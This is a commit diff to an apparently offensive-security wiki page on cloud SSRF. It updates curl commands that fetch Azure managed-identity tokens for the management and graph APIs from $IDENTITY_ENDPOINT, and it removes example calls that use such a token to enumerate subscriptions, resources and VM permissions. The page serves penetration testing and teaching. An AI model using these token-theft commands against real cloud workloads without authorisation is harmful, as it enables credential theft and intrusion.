GITBOOK-4453: No subject

pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md

@@ -482,26 +482,13 @@ Most of the time, you want a token for one of these resources:
 echo $IDENTITY_HEADER
 echo $IDENTITY_ENDPOINT
 
-# You should also be able to find the folder:
+# (Fingerprint) You should also be able to find the folder:
 ls /opt/microsoft
-#and the file
-ls /opt/microsoft/msodbcsql17
 
 # Get management token
-curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
+curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2019-08-01" -H X-IDENTITY-HEADER:$IDENTITY_HEADER
 # Get graph token
-curl "$IDENTITY_ENDPOINT?resource=https://graph.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
-
-# API
-# Get Subscriptions
-URL="https://management.azure.com/subscriptions?api-version=2020-01-01"
-curl -H "Authorization: $TOKEN" "$URL"
-# Get current permission on resources in the subscription
-URL="https://management.azure.com/subscriptions/<subscription-uid>/resources?api-version=2020-10-01'"
-curl -H "Authorization: $TOKEN" "$URL"
-# Get permissions in a VM
-URL="https://management.azure.com/subscriptions/<subscription-uid>/resourceGroups/Engineering/providers/Microsoft.Compute/virtualMachines/<VM-name>/providers/Microsoft.Authorization/permissions?api-version=2015-07-01"
-curl -H "Authorization: $TOKEN" "$URL"
+curl "$IDENTITY_ENDPOINT?resource=https://graph.azure.com/&api-version=2019-08-01" -H X-IDENTITY-HEADER:$IDENTITY_HEADER
 ```
 
 ```powershell
@@ -650,4 +637,3 @@ Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" d
 
 </details>
 {% endhint %}
-